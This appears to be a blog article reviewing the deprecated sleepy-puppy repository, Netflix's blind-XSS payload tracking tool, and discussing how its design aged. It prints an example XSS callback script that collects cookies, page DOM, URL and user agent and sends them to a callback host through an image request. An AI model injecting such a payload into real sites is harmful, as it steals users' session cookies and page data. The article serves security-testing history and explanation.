> your AI agent picks dependencies from memory; give it dated facts — try starlog.dev ↗ vet your agent's deps ↗ vibe-coding is fine. vibe-importing isn’t. — try starlog.dev ↗ vibe-importing isn’t fine ↗ your agent has never seen your private packages — try starlog.dev ↗ facts for private packages ↗ a linter for the dependencies your AI agent picks — try starlog.dev ↗ a linter for agent deps ↗

Back to Articles

Sleepy Puppy: Netflix's Deprecated XSS Hunter and the Evolution of Enterprise Security Testing

[ View on GitHub ]

Sleepy Puppy: Netflix's Deprecated XSS Hunter and the Evolution of Enterprise Security Testing

Hook

Before Netflix open-sourced their security tools, a lone engineer's GitHub repository quietly revolutionized how Fortune 500 companies hunted for cross-site scripting vulnerabilities across thousands of applications simultaneously.

Context

In the early 2010s, security teams at rapidly scaling tech companies faced an intractable problem: how do you systematically test for XSS vulnerabilities when you have hundreds of applications, thousands of input fields, and an infrastructure that changes daily? Traditional approaches required manually injecting payloads, checking each endpoint, and somehow tracking which test payload appeared where. At Netflix, where microservices proliferated and new features shipped continuously, this manual process was untenable.

The sbehrens/sleepy-puppy repository represents Scott Behrens' initial work on what would become Netflix's answer to this scaling problem. While the repository itself is deprecated and redirects users to the official Netflix/sleepy-puppy version, it offers a fascinating glimpse into how enterprise security tooling evolved from individual contributor projects into formalized open-source frameworks. The core innovation was simple but powerful: treat XSS payloads as trackable entities with unique identifiers, inject them across your application landscape, and wait for callbacks to tell you where they executed. This transformed XSS testing from a labor-intensive manual process into a scalable, data-driven operation.

Technical Insight

Sleepy Puppy Server

Create/manage payloads

Store payload metadata

Generate unique XSS payload

Inject payload

Execute script

Log execution context

Display results

Security Tester

Sleepy Puppy Web Interface

Payload Database

Target Application

Victim Browser

Callback Endpoint

System architecture — auto-generated

Sleepy Puppy's architecture introduced a paradigm shift by separating payload creation from execution detection. The system centered on a payload management server that generated unique XSS payloads embedding callback URLs. When these payloads executed in a victim browser, they would phone home with context about where and how the injection succeeded.

The fundamental pattern looked something like this:

// Generated payload structure
<script src="https://sleepy-puppy.internal/payload/abc123.js"></script>

// The callback payload (abc123.js) would contain:
(function() {
  var data = {
    payload_id: 'abc123',
    url: window.location.href,
    cookies: document.cookie,
    dom: document.documentElement.outerHTML.substring(0, 5000),
    referrer: document.referrer,
    user_agent: navigator.userAgent,
    timestamp: new Date().toISOString()
  };
  
  // Send execution context back to Sleepy Puppy
  var img = new Image();
  img.src = 'https://sleepy-puppy.internal/capture?' + 
    Object.keys(data).map(k => k + '=' + encodeURIComponent(data[k])).join('&');
})();

This callback mechanism solved the attribution problem inherent in large-scale XSS testing. Without unique identifiers, discovering an XSS vulnerability weeks after injection meant forensic work to determine which test payload succeeded and where it was originally injected. Sleepy Puppy's payload tracking meant every successful execution automatically mapped back to specific assessments, testers, and application contexts.

The web interface provided CRUD operations for payload management, allowing security engineers to create payload collections targeted at different vulnerability classes: stored XSS, reflected XSS, DOM-based XSS, and even polyglot payloads designed to break out of multiple contexts. Each payload variant received a unique identifier, enabling A/B testing of different evasion techniques across the same application surface.

The database schema likely followed this pattern:

# Simplified conceptual model
class Payload(db.Model):
    id = db.Column(db.String(36), primary_key=True)
    payload_content = db.Column(db.Text)
    assessment_id = db.Column(db.String(36), db.ForeignKey('assessment.id'))
    created_by = db.Column(db.String(255))
    created_at = db.Column(db.DateTime)
    payload_type = db.Column(db.String(50))  # stored, reflected, dom

class Capture(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    payload_id = db.Column(db.String(36), db.ForeignKey('payload.id'))
    url = db.Column(db.Text)
    captured_at = db.Column(db.DateTime)
    cookies = db.Column(db.Text)
    dom_snapshot = db.Column(db.Text)
    referrer = db.Column(db.Text)

What made this architecture particularly elegant for Netflix's use case was the decoupling of testing and monitoring. Security engineers could inject hundreds of payloads into staging environments, internal tools, or even production systems (with appropriate safeguards), then simply wait. The callback server ran continuously, capturing execution events asynchronously. This fire-and-forget model meant testing didn't block development workflows, and vulnerabilities revealed themselves over time as different code paths were exercised.

The system also enabled collaborative testing at scale. Multiple security engineers could create assessments, inject their payloads, and all captures would funnel into a centralized dashboard. This prevented duplicate testing and created institutional knowledge about which application areas were historically vulnerable, which payload techniques worked against specific frameworks, and how quickly vulnerabilities were being remediated.

Gotcha

The elephant in the room: this specific repository is completely deprecated and unmaintained. Scott Behrens himself redirects users to the official Netflix/sleepy-puppy repository, making this fork purely a historical artifact. Any attempt to deploy this code would be foolhardy—you'd be working with an outdated codebase, unpatched security vulnerabilities (ironic for a security tool), and zero community support.

But even the official Netflix version has aged in ways that matter. Sleepy Puppy emerged in an era when Content Security Policy adoption was nascent and XSS detection tools were primitive. Modern web applications increasingly deploy CSP headers that block inline script execution and restrict script sources, rendering many traditional XSS payloads ineffective. Sleepy Puppy's callback mechanism relies on being able to load external JavaScript or exfiltrate data via image requests—techniques that strict CSP policies explicitly prevent. Additionally, the rise of JavaScript frameworks like React, Vue, and Angular, which provide built-in XSS protections through automatic escaping, has shifted the vulnerability landscape. Today's XSS bugs are more likely to involve CSP bypasses, DOM clobbering, or prototype pollution than simple script injection into HTML contexts. A tool designed for 2014's threat landscape requires significant adaptation for 2024's realities.

Verdict

Skip if: You're looking for actively maintained security tooling—this repository is deprecated and should not be used under any circumstances. Even for learning purposes, the official Netflix/sleepy-puppy repository is the better choice. Skip if you need a modern XSS testing solution that understands CSP, SameSite cookies, and contemporary JavaScript frameworks. Use if: You're researching the evolution of security engineering practices at high-scale tech companies or studying how open-source security projects emerge from individual engineering efforts. This repository serves as a historical marker showing how Netflix's security team approached systematic vulnerability testing before formalizing their open-source program. For actual XSS testing, use XSS Hunter Express (the modern evolution of these concepts), integrate Burp Suite Collaborator for comprehensive out-of-band vulnerability detection, or contribute to the official Netflix/sleepy-puppy repository if you're committed to the centralized payload management approach. The real value of sbehrens/sleepy-puppy lies not in its code but in understanding the architectural patterns that influenced a generation of security tooling—patterns that persist in modern bug bounty platforms and enterprise security frameworks.